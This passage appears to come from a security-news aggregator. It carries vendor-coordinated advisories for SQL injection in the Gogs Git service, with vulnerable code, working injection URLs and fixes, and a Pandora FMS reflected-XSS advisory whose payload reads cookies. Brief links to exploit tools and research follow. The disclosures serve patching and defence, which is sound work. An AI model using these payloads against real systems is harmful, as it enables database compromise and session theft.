Proof of Concept
================
Request:
http://www.example.com/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09
(SELECT%09null
)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09
user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)
%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09
as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as
%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09
a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09
JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN
%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN
%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN
%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN
%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN
%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27

Response:
{"data":[{"repolink":"bluec0re/test"},{"repolink":"bluec0re/secret"},{"repolink"
:"bluec0re/root@localhost"}],"ok":true}


Solution
========
This vulnerability could easily be fixed by using prepared statements:

sess.And("lower_name like ?", "%" + opt.Keyword + "%").Find(&repos)

Update to version 0.5.6.1105.


Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45


Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned


Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>


References
==========Update to version 0.5.6.1105.
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1402.txt


Advisory-ID
===========
BC-1402


Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.



Unauthenticated SQL Injection in Gogs user search
=================================================
Researcher: Timo Schmid <tschmid@ernw.de>


Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])

It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.

Gogs provides an api view to give javascript code the possibility to
search for
existing users in the system. This view is accessible at
/api/v1/users/search?q=<search query>.

The q Parameter of this view is vulnerable to SQL injection.


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


CVSS Base Score
===============
8.3 (AV:N / AC:M / Au:N / C:C / I:P / A:P)


CVE-ID
======
CVE-2014-8682


Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.


Status
======
Fixed by Vendor


Vulnerable Code Section
=======================
models/user.go:
[...]
// SearchUserByName returns given number of users whose name contains
keyword.
func SearchUserByName(opt SearchOption) (us []*User, err error) {
    opt.Keyword = FilterSQLInject(opt.Keyword)
    if len(opt.Keyword) == 0 {
        return us, nil
    }
    opt.Keyword = strings.ToLower(opt.Keyword)

    us = make([]*User, 0, opt.Limit)
    err = x.Limit(opt.Limit).Where("type=0").And("lower_name like '%" +
opt.Keyword + "%'").Find(&us)
    return us, err
}
[...]

The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. Because of the SQL filter at the method entry, attackers
can't use spaces (0x20) and since v0.5.6.1025-g83283b commas are also
filtered.


Proof of Concept
================
Request:
http://www.example.com/api/v1/users/search?q='/**/and/**/false)/**/union/**/
select/**/null,null,@@version,null,null,null,null,null,null,null,null,null,null
,
null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from
/**/mysql.db/**/where/**/('%25'%3D'

Response:
{"data":[{"username":"5.5.40-0ubuntu0.14.04.1","avatar":
"//1.gravatar.com/avatar/"}],"ok":true}


Solution
========
This vulnerability could easily be fixed by using prepared statements:

err = x.Limit(opt.Limit).Where("type=0").And("lower_name like ?", "%" +
opt.Keyword + "%").Find(&us)

Update to version 0.5.6.1105.


Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1104-g0c5ba45


Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-11-03: Contacted developer
2014-11-04: Fixed in master branch
2014-11-14: CVE-ID assigned


Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>


References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1403.txt


Advisory-ID
===========
BC-1403


Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.


- --
Timo Schmid

ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

CVE-2014-8681 Blind SQL Injection in Gogs label search

$
0
0
Blind SQL Injection in Gogs label search
========================================
Researcher: Timo Schmid <tschmid@ernw.de>


Description
===========
Gogs(Go Git Service) is a painless self-hosted Git Service written in
Go. (taken
 from [1])

It is very similiar to the github hosting plattform. Multiple users can
create
multiple repositories and share code with others with the git version
control
system. Repositories can be marked as public or private to prevent
access from
 unauthorized users.

Gogs provides a view to filter issues by labels. This view is accessible at
/<username>/<repository>/issues?labels=&type=&state=

The labels Parameter of this view is vulnerable to a blind SQL injection.


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


CVSS Base Score
===============
6.6 (AV:N / AC:H / Au:N / C:C / I:P / A:P)


CVE-ID
======
CVE-2014-8681


Impact
======
The vulnerability results at least in a complete compromise of the database.
Depending on the particular database configuration a compromise of the
system
is also possible.


Status
======
Fixed by Vendor


Vulnerable Code Section
=======================
models/issue.go:
[...]
// GetIssues returns a list of issues by given conditions.
func GetIssues(uid, rid, pid, mid int64, page int, isClosed bool, labelIds,
sortType string) ([]Issue, error) {
    sess := x.Limit(20, (page-1)*20)

    if rid > 0 {
        sess.Where("repo_id=?", rid).And("is_closed=?", isClosed)
    } else {
        sess.Where("is_closed=?", isClosed)
    }

    if uid > 0 {
        sess.And("assignee_id=?", uid)
    } else if pid > 0 {
        sess.And("poster_id=?", pid)
    }

    if mid > 0 {
        sess.And("milestone_id=?", mid)
    }

    if len(labelIds) > 0 {
        for _, label := range strings.Split(labelIds, ",") {
            sess.And("label_ids like '%$" + label + "|%'")
        }
    }
[...]

The vulnerability exists because of a string concatination in the SQL
query with
user supplied data. A attacker is restricted to not use commas in the
injection
string as the program splits input at commas.


Proof of Concept
================
Test of version string contains at least 10 characters:
http://www.example.com/user/repos/issues?label=' or
char_length(@@version) > 10
and '|%'='&type=all&state=

Returns all issues if true, non if false.

This could be used to extract data with a binary search.


Solution
========
This vulnerability could easily be fixed by using prepared statements:

sess.And("label_ids like ?", "%$" + label + "|%")

Update to Version 0.5.6.1025.

Affected Versions
=================
>= v0.3.1-9-g49dc57e
<= v0.5.6.1024-gf1d8746


Timeline
========
2014-09-25: Developer informed
2014-10-16: Contact of developer regarding fix
2014-10-25: Working together with developer on fix
2014-10-25: Fixed by ensuring datatype of user input
2014-11-14: CVE-ID assigned


Credits
=======
Pascal Turbing <pturbing@ernw.de>
Jiahua (Joe) Chen <u@gogs.io>


References
==========
[1] https://github.com/gogits/gogs
[2] http://gogs.io/
[3]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-1/
[4]
http://www.insinuator.net/2012/05/sql-injection-testing-for-business-purposes-part-2/
[5]
http://www.insinuator.net/2012/06/sql-injection-testing-for-business-purposes-part-3/
[6] https://www.ernw.de/download/BC-1401.txt


Advisory-ID
===========
BC-1401


Disclaimer
==========
The information herein contained may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are NO
warranties, implied or otherwise, with regard to this information or its
use.
Any use of this information is at the user's risk. In no event shall the
author/
distributor be held liable for any damages whatsoever arising out of or in
connection with the use or spread of this information.

- --
Timo Schmid

ERNW GmbH, Carl-Bosch-Str. 4, 69115 Heidelberg  -  www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 151 16227192
PGP-FP 971B D4F7 5DD1 FCED 11FC 2C61 7AB6 927D 6F26 6CE0

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

==============================================================
|| Blog: www.insinuator.net | | Conference: www.troopers.de ||
==============================================================
==================   TROOPERS15   ==================
*   International IT Security Conference & Workshops
*   16th - 20st March 2015 / Heidelberg, Germany
*   www.troopers.de
====================================================

XSS Reflected in Page visualization agents in Pandora FMS v5.1SP1 - Revisión PC141031 (CVE-2014-8629)

$
0
0
I. VULNERABILITY

-------------------------

XSS Reflected in Page visualization agents in Pandora FMS v5.1SP1 -
Revisión PC141031

II. BACKGROUND
Pandora FMS is the monitoring software chosen by several companies all
around the world for managing their IT infrastructure. Besides ensuring
high performance and maximum flexibility, it has aIII.

DESCRIPTION
-------------------------
Has been detected a Reflected XSS vulnerability in Pandora FMS in page
visualization agents, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser.

The code injection is done through the parameter "refr" in the page
“/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=”

IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter “refr”.

Malicious Request ("refr")

Vulnerable:

http://firefly.artica.es/pandora_demo/index.php?sec=estado&sec2=operat
ion/agentes/estado_agente&refr=
</script><script>alert(document.cookie)
</script>0&group_id=0

V. BUSINESS IMPACT
-------------------------
An attacker can send link and choice text write in page.

VI. SYSTEMS AFFECTED

-------------------------

Pandora FMS v5.1SP1 - Revisión PC141031

VII. SOLUTION
-------------------------
All data received by the application and can be modified by the user,
before making any kind of transaction with them must be validated

By William Costa

william.costa@gmail.com

81% of Tor users can be de-anonymised by analysing router information, research indicates

$
0
0
Research undertaken between 2008 and 2014 suggests that more than 81% of Tor clients can be ‘de-anonymised’ – their originating IP addresses revealed – by exploiting the ‘Netflow’ technology that Cisco has built into its router protocols, and similar traffic analysis software running by default in the hardware of other manufacturers.

more here.........http://thestack.com/chakravarty-tor-traffic-analysis-141114

Cisco-SNMP-Slap

$
0
0
cisco-snmp-slap utilises IP address spoofing in order to bypass an ACL
protecting an SNMP service on a Cisco IOS device.

Typically IP spoofing has limited use during real attacks outside DoS. Any TCP
service cannot complete the inital handshake. UDP packets are easier to spoof
but the return packet is often sent to the wrong address, which makes it
difficult to collect any information returned.

However if an attacker can guess the snmp rw community string and a valid source
address an attacker can set SNMP MiBs. One of the more obvious uses for this
is to have a Cisco SNMP service send its IOS configuration file to another
device.

This tool allows you to try one or more community strings against a Cisco device
from one or more IP addresses.

more here.........https://github.com/nccgroup/Cisco-SNMP-Slap

Vita native hack: vitasploit released by Hykem

$
0
0
Native vita hack news keep coming for those of you who managed to keep their Vita in firmware 3.18 or under.

Yesterday, developer Hykem released his own set of tools to leverage the Webkit exploit on the PS Vita .

more here........http://wololo.net/2014/11/14/vita-native-hack-vitasploit-released-by-hykem/

Exploitation of Philips Smart TV

$
0
0
My Philips Smart TV is a Linux box standing there in my living room : that's a sufficient reason to try to get root.


more here........http://www.fredericb.info/2014/11/exploitation-of-philips-smart-tv.html

DigimarcPIN

$
0
0
You may be familiar with Digimarc for Images. It's a tool for watermarking photos to prove you own the copyright, in a way that doesn't ruin the photo like a traditional watermark. When you try to embed a watermark, you must enter your six-digit Digimarc ID, which identifies a specific copyright owner who registered with Digimarc, as well as a two-digit PIN. Without the PIN, Digimarc won't apply the watermark. However, as the correct PIN is calculated locally, I was able to figure out how it was generated, and create this tool which will help if you ever lose your PIN. Just enter your Digimarc ID, and it will instantly tell you your PIN.

more here........https://github.com/flarn2006/DigimarcPIN
Viewing all 8064 articles
Browse latest View live